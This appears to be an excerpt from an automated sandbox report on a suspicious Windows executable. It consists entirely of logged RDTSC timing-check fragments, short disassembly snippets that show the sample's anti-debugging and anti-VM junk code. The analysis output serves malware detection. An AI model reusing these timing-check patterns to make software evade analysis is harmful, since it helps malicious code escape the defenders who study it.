Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4BC3 second address: 10E4BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E74C1 second address: 10E74CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F87BC5165C2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E74CD second address: 10E74D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 105F08B second address: 105F09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BC5165BDh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EA17D second address: 10EA181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EA181 second address: 10EA185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EA185 second address: 10EA1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC93h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F87BD02CC97h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F87BD02CC86h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EA47D second address: 10EA489 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F87BC5165B6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EA489 second address: 10EA49E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC8Bh 0x00000009 jnc 00007F87BD02CC86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EA49E second address: 10EA4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EF8E5 second address: 10EF8EF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F87BD02CC92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EFD39 second address: 10EFD43 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F87BC5165B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EFD43 second address: 10EFD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jnp 00007F87BD02CC94h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10EFD54 second address: 10EFD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F0CE5 second address: 10F0D0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F87BD02CC91h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F0D0F second address: 10F0D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F87BC5165C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F0D30 second address: 10F0D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F0D34 second address: 10F0D3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F26E9 second address: 10F26ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F26ED second address: 10F2706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F87BC5165BBh 0x0000000d je 00007F87BC5165B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F2706 second address: 10F270A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 104FE1F second address: 104FE25 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 104FE25 second address: 104FE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 104FE2F second address: 104FE35 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F5ADD second address: 10F5AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push ecx 0x0000000a je 00007F87BD02CC86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F5DF5 second address: 10F5E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F87BC5165B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F98D0 second address: 10F98DC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F87BD02CC8Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F98DC second address: 10F98EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F87BC5165C2h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F9B8B second address: 10F9B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F9B8F second address: 10F9BA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F9D11 second address: 10F9D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007F87BD02CC86h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F87BD02CC98h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F9D3C second address: 10F9D5C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F87BC5165BCh 0x00000011 jnl 00007F87BC5165B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F9D5C second address: 10F9D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10F9D61 second address: 10F9D66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 110273D second address: 110276B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F87BD02CC8Dh 0x0000000e jmp 00007F87BD02CC98h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 110276B second address: 110276F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1100637 second address: 110063B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 110063B second address: 1100641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1100641 second address: 1100651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F87BD02CC86h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1100651 second address: 110065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F87BC5165B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 110065C second address: 1100667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1101487 second address: 110148D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 110148D second address: 11014B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F87BD02CC8Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F87BD02CC8Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11017D1 second address: 11017D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11017D5 second address: 11017E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11017E1 second address: 11017E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11017E5 second address: 11017F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F87BD02CC86h 0x0000000e jno 00007F87BD02CC86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11017F9 second address: 11017FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1101DCC second address: 1101DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F87BD02CC86h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jc 00007F87BD02CC8Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11020AB second address: 11020EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F87BC5165B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F87BC5165C9h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F87BC5165C2h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11020EE second address: 1102103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1102103 second address: 110210D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 110210D second address: 110213B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC95h 0x00000007 jmp 00007F87BD02CC95h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 110213B second address: 1102141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1102141 second address: 1102145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1102145 second address: 1102149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1105E16 second address: 1105E21 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1105E21 second address: 1105E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1105E27 second address: 1105E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1105F84 second address: 1105F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1105F89 second address: 1105F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1105F8F second address: 1105FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F87BC5165C9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1105FB2 second address: 1105FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 110610D second address: 1106112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 111092E second address: 1110941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110941 second address: 1110945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110945 second address: 1110968 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F87BD02CC96h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110AB7 second address: 1110ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110ABB second address: 1110AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110DB2 second address: 1110DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F87BC5165B6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F87BC5165C9h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110DDC second address: 1110DF9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F87BD02CC98h 0x00000008 jmp 00007F87BD02CC92h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110F43 second address: 1110F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110F49 second address: 1110F82 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F87BD02CC8Ah 0x0000000e jmp 00007F87BD02CC91h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F87BD02CC8Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 111135C second address: 1111360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1111360 second address: 1111366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1111366 second address: 1111389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F87BC5165C9h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11114C2 second address: 11114CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F87BD02CC86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1111611 second address: 111161C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 111161C second address: 1111622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1111785 second address: 1111793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F87BC5165B8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1111793 second address: 11117D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F87BD02CC92h 0x00000008 jp 00007F87BD02CC86h 0x0000000e jnc 00007F87BD02CC86h 0x00000014 jmp 00007F87BD02CC8Fh 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F87BD02CC8Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11117D4 second address: 11117DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110488 second address: 11104B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC97h 0x00000009 jl 00007F87BD02CC8Eh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jl 00007F87BD02CC86h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11104B1 second address: 11104D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F87BC5165C7h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11104D4 second address: 1110508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F87BD02CC8Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F87BD02CC91h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1110508 second address: 111050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 111050C second address: 1110510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 112925F second address: 1129263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1130402 second address: 1130408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1133ACA second address: 1133AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F87BC5165B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 113C87A second address: 113C87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 113C87E second address: 113C882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 113C882 second address: 113C88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 113C88B second address: 113C890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 113C890 second address: 113C8C0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F87BD02CC8Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F87BD02CC97h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 113C8C0 second address: 113C8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F87BC5165B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 113C8CA second address: 113C8CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
